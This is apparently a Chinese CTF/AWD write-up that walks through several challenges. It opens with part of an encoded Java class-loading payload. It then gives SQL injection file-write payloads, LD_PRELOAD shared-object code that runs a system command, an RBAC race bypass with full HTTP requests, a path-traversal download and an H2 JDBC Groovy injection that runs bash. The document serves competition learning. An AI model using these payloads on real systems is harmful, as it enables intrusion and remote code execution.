sTAR4DvQB8tgEaAQO9AAS2AN9OLbYAehMBIAS9AHxZAxIPU7YBGi0EvQAEWQMqU7YA38AAyMAAyLAAAQAAACwALQAYAAQAGQAAABoABgAAAJAABwCRAC0AkgAuAJMANQCUAEkAlQAaAAAANAAFAAcAJgEMAKgAAQBJACYBDQAcAAMALgBBAQ4ASwACAAAAbwEPAQQAAAA1ADoBDACoAAEAIgAAABYAAgAHACYBDAEQAAEANQA6AQwBEAABACgAAAAGAAFtBwAYAAsAAAAKAAQBIgCcAJ4AmgAJAMMAxAACAAcAAADUAAQABgAAAD67AS1ZtwEyTLsBL1kqtwE1TbsBMVkstwE4ThEBALwIOgQtGQS2ATxZNgWbAA8rGQQDFQW2AUCn/+srtgFEsAAAAAMAGQAAAB4ABwAAAJoACACbABEAnAAaAJ0AIQCfAC0AoAA5AKIAGgAAAD4ABgAAAD4BIwCkAAAACAA2ASQBJQABABEALQEmAScAAgAaACQBKAEpAAMAIQAdASoApAAEACoAFAErAQIABQAoAAAAHAAC/wAhAAUHAMgHAS0HAS8HATEHAMgAAPwAFwEACwAAAAQAAQANAAgAZwBZAAIABwAAAFcAAgADAAAAESoruAFMTSwEtgFPLCq2AVCwAAAAAgAZAAAADgADAAAApgAGAKcACwCoABoAAAAgAAMAAAARAUUAHAAAAAAAEQFGAQQAAQAGAAsBRwFIAAIACwAAAAQAAQAYAAgBSQFKAAIABwAAAMcAAwAEAAAAKCq2AHpNLMYAGSwrtgFXTi0EtgFPLbBOLLYBWk2n/+m7AVJZK7cBW78AAQAJABUAFgFSAAQAGQAAACYACQAAAKwABQCtAAkArwAPALAAFACxABYAsgAXALMAHAC0AB8AtgAaAAAANAAFAA8ABwFHAUgAAwAXAAUASgFTAAMAAAAoAUUAHAAAAAAAKAFGAQQAAQAFACMApwCoAAIAIgAAAAwAAQAFACMApwEQAAIAKAAAAA0AA/wABQcAfFAHAVIIAAsAAAAEAAEBUgAoAFgAWQACAAcAAABCAAQAAgAAAA4qKwO9AHwDvQAEuADtsAAAAAIAGQAAAAYAAQAAALoAGgAAABYAAgAAAA4BXAAcAAAAAAAOAV0BBAABAAsAAAAIAAMAnACaAJ4AKQBYAOsAAgAHAAACFwADAAkAAADKKsEAfJkACirAAHynAAcqtgB6OgQBOgUZBDoGGQXHAGQZBsYAXyzHAEMZBrYBazoHAzYIFQgZB76iAC4ZBxUIMrYBbCu2AW+ZABkZBxUIMrYBc76aAA0ZBxUIMjoFpwAJhAgBp//QpwAMGQYrLLYA0ToFp/+pOgcZBrYBWjoGp/+dGQXHAAy7AJxZK7cBdL8ZBQS2ANcqwQB8mQAaGQUBLbYA37A6B7sAlVkZB7YBd7cBeL8ZBSottgDfsDoHuwCVWRkHtgF3twF4vwADACUAcgB1AJwAnACjAKQAmgCzALoAuwCaAAMAGQAAAG4AGwAAAL4AFAC/ABcAwQAbAMIAJQDEACkAxgAwAMcAOwDIAFYAyQBdAMoAYADHAGYAzQBpAM4AcgDSAHUA0AB3ANEAfgDSAIEA1ACGANUAjwDXAJUA2ACcANoApADbAKYA3ACzAOAAuwDhAL0A4gAaAAAAegAMADMAMwEBAQIACAAwADYBXgFfAAcAdwAHAEoBYAAHAKYADQBKAWEABwC9AA0ASgFhAAcAAADKAUUAHAAAAAAAygFdAQQAAQAAAMoBYgFjAAIAAADKAWQA4QADABQAtgCnAKgABAAXALMBZQCmAAUAGwCvAWYAqAAGACgAAAAvAA4OQwcAfP4ACAcAfAcA0wcAfP0AFwcBZwEs+QAFAghCBwCcCw1UBwCaDkcHAJoACwAAAAgAAwCcAJ4AmgAIAXkAFgABAAcAAAAlAAIAAAAAAAm7AAJZtwF6V7EAAAABABkAAAAKAAIAAAAhAAgAIgAA';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
第一台里面有 MySQL, Redis 等
内网
内网有台Windows Server起的apache, 存在FTP匿名用户访问, 可以上传下载文件
可以改个.htaccess
<FilesMatch "\.php$">
SetHandler application/x-httpd-php
</FilesMatch>
实际上这里不是 php解析, 是 cgi 解析, 具体 wp 可以看本站另一篇 春秋云境 finance
还有一台Ollama的CVE漏洞
剩下的就没什么时间看了
hardPHP
这道题挺有意思
大概就是给了一个 SQL 注入的点, 但是要输入的 password 和数据库查出来的 password 保持一致
所以利用 dumpfile和 load_file, 第一次注入把第二次查询的表达式写入到文件里, 第二次查询拿出来文件内容和表达式一致
'union/**/select/**/'\'union/**/select/**/load_file(\'/tmp/222\')/**/union/**/select\''/**/into/**/dumpfile/**/'/tmp/222
'union/**/select/**/load_file('/tmp/222')/**/union/**/select'
之后在 admin.php里执行了system("ls")
漏洞点是
<?php
foreach ($_REQUEST['env'] as $key => $value) {
putenv("$key=$value");
}
当然里面有非常之多的过滤,除去那些看到这里差不多就知道了, 利用LD_PRELOAD注入环境变量, LD_PRELOAD=/tmp/xxx
/tmp/xxx是我们恶意上传的 so 文件
还记得我们之前如何登录的吗, 这个数据库允许 dumpfile, 那我们直接写 so 文件就好了
'union/**/select/**/unhex('这里是你的 hex 编码后的数据')/**/into/**/dumpfile/**/'/tmp/xxx
gcc 构建一下 so 文件
gcc -shared -fPIC -o preload.so preload.c
#define _GNU_SOURCE
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
__attribute__ ((__constructor__)) void preload (void){
unsetenv("LD_PRELOAD");
system("cat /f1ag");
}
最后成功 RCE
第二天
rbac
package main
import (
"errors"
"os"
"path/filepath"
"strings"
"github.com/gin-gonic/gin"
)
var RBACList = make(map[string]int)
type ResTemplate struct {
Success bool
Data any
}
type ExecStruct struct {
File []string
Directory []string
Pwd []string
Flag []string
FuncName string
Param string
}
func main() {
r := gin.Default()
initRBAC()
r.GET("/", func(c *gin.Context) {
htmlContent, err := os.ReadFile("index.html")
if err != nil {
c.String(400, "Error loading HTML file")
return
}
c.Writer.Write(htmlContent)
})
r.GET("/getCurrentRBAC", func(c *gin.Context) {
var response ResTemplate
if RBACList["rbac:read"] == 1 {
response = ResTemplate{
Success: true,
Data: RBACList,
}
c.JSON(200, response)
} else {
response = ResTemplate{
Success: false,
}
c.JSON(403, response)
}
})
r.POST("/execSysFunc", func(c *gin.Context) {
var execStruct ExecStruct
var response ResTemplate
err := c.ShouldBindJSON(&execStruct)
if err != nil {
response = ResTemplate{
Success: false,
Data: map[string]string{"error": err.Error()},
}
c.JSON(400, response)
}
// permission grant
RBACToGrant := make(map[string]int)
var value string
maxDeep := 0
if execStruct.Directory != nil {
for _, value = range execStruct.Directory {
if maxDeep < 8 {
RBACToGrant["directory:"+value] = 1
maxDeep++
} else {
break
}
}
}
if execStruct.Flag != nil {
for _, value = range execStruct.Flag {
if maxDeep < 8 {
RBACToGrant["flag:"+value] = 1
maxDeep++
} else {
break
}
}
}
if execStruct.Pwd != nil {
for _, value = range execStruct.Pwd {
if maxDeep < 8 {
RBACToGrant["pwd:"+value] = 1
maxDeep++
} else {
break
}
}
}
if execStruct.File != nil {
for _, value = range execStruct.File {
// Grant temporary file:return permissions
if value == "return" && RBACList["rbac:change_return"] != 1 {
if maxDeep < 5 {
RBACToGrant["rbac:change_return:1"] = 1
RBACToGrant["file:"+value] = 1
RBACToGrant["rbac:change_return:0"] = 1
maxDeep += 3
} else {
break
}
} else {
if maxDeep < 8 {
RBACToGrant["file:"+value] = 1
maxDeep++
} else {
break
}
}
}
}
updateRBAC(RBACToGrant)
result, err := execCommand(execStruct.FuncName, execStruct.Param)
if err != nil {
response = ResTemplate{
Success: false,
Data: map[string]string{"error": err.Error()},
}
c.JSON(400, response)
} else {
response = ResTemplate{
Success: true,
Data: map[string]string{"result": result},
}
initRBAC()
c.JSON(200, response)
}
})
r.Run(":80")
}
func initRBAC() {
RBACList = make(map[string]int)
RBACList["file:read"] = 0
RBACList["file:return"] = 0
RBACList["flag:read"] = 0
RBACList["flag:return"] = 0
RBACList["pwd:read"] = 0
RBACList["directory:read"] = 0
RBACList["directory:return"] = 0
RBACList["rbac:read"] = 1
RBACList["rbac:change_read"] = 1
RBACList["rbac:change_return"] = 0
}
func updateRBAC(RBACToGrant map[string]int) {
for key, value := range RBACToGrant {
if strings.HasSuffix(key, ":read") {
if RBACList["rbac:change_read"] == 1 {
RBACList[key] = value
}
} else if strings.HasSuffix(key, ":return") {
if RBACList["rbac:change_return"] == 1 {
RBACList[key] = value
}
} else if key == "rbac:change_return:1" {
RBACList["rbac:change_return"] = 1
} else if key == "rbac:change_return:0" {
RBACList["rbac:change_return"] = 0
} else {
RBACList[key] = value
}
}
}
func execCommand(funcName string, param string) (string, error) {
if funcName == "getPwd" {
if RBACList["pwd:read"] == 1 {
pwd, err := os.Getwd()
return pwd, err
} else {
return "No Permission", nil
}
} else if funcName == "getDirectory" {
// read directory
if RBACList["directory:read"] == 1 {
var fileNames []string
err := filepath.Walk(param, func(path string, info os.FileInfo, err error) error {
fileNames = append(fileNames, info.Name())
return nil
})
if err != nil {
return "error", err
}
directoryFiles := strings.Join(fileNames, " ")
if RBACList["directory:return"] == 1 {
return directoryFiles, nil
} else {
return "the directory " + param + " exists", nil
}
} else {
return "No Permission", nil
}
} else if funcName == "getFile" {
// read file
if RBACList["file:read"] == 1 {
if strings.Contains(param, "flag") {
if RBACList["flag:read"] != 1 {
return "No Permission", nil
}
}
data, err := os.ReadFile(param)
if err != nil {
return "file:"+param+" doesn't exist", nil
}
content := string(data)
if RBACList["file:return"] == 0 {
return "the file " + param + " exists", nil
} else if RBACList["file:return"] == 1 && !strings.Contains(param, "flag") {
return content, nil
} else if RBACList["file:return"] == 1 && strings.Contains(param, "flag") && RBACList["flag:return"] == 1 {
return content, nil
} else {
return "the file " + param + " exists", nil
}
} else {
return "No Permission", nil
}
} else {
return "No such func", errors.New("No such func")
}
}
关键点是 initRBAC()时机, 这里其实 Dir 给了不存在的目录 Walk 的时候就会直接 panic, 也不会去执行这个initRBAC(),也就是每次请求返回 err 或者 panic 的时候, 就会直接保留上次请求申请的权限.
if err != nil {
response = ResTemplate{
Success: false,
Data: map[string]string{"error": err.Error()},
}
c.JSON(400, response)
} else {
response = ResTemplate{
Success: true,
Data: map[string]string{"result": result},
}
initRBAC()
c.JSON(200, response)
}
attack
初始访问 RBAC 权限列表
构造请求
请求 1
POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 138
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"File":[
"read",
"return"],"Directory":[
"read",
"return"],"Pwd":[
],"Flag":[
"read"],"FuncName":"getDirectory","Param":"/tmp/zxx"}
这里注意一下,由于for range遍历 map 的时候, 顺序不是塞进去的顺序, 打个 log 就能发现, 这里实际上是先设置rbac:change_return:0为 1, 后设置rbac:change_return:1 : 1, 而我们触发了 panic, 之后随便设置 return 都可以了
current kv: file:return : 1
current kv: rbac:change_return:0 : 1
current kv: directory:read : 1
current kv: flag:read : 1
current kv: file:read : 1
current kv: rbac:change_return:1 : 1
简单来说, 就是第一次让rbac:change_return:1 在 rbac:change_return:0 后面被遍历, 这样在 err 或者 panic 的情况下 rbac:change_return的值就永远是 1 了
请求 2
POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 116
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"File":[
"return"
],"Directory":[
],"Pwd":[
],"Flag":[
"return"],"FuncName":"getDirectory","Param":"/tmp/zxx"}
请求三
POST /execSysFunc HTTP/2
Host: eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Content-Length: 88
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: zh-CN,zh;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: */*
Origin: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://eci-2zefjnatr5kz6ajki0cs.cloudeci1.ichunqiu.com:80/
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
{"File":[
],"Directory":[
],"Pwd":[
],"Flag":[],"FuncName":"getFile","Param":"/flag"}
fix
看着修
security_rasp
百度的 openrasp, 然后给了个反序列化入口, 打的应该是绕过黑名单
attack
不会, 我讨厌 java
fix
把所有 return 全部改成 block
OTA
attack
wget url/static/%2f/%2f/%2e%2e/%2f/%2f/%2e%2e/opt/ota.jar
把文件下来弄到jwtkey, 然后伪造 session,执行命令
然后打groovy
{
"jdbcUrl": "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '@groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec(\"bash -c {echo,cmd}|{base64,-d}|{bash,-i}\")})def x'",
"username": "sa",
"password": "11111111"
}
fix
路径穿越,更新一下 spring-parent 从 3.3.3换到3.3.4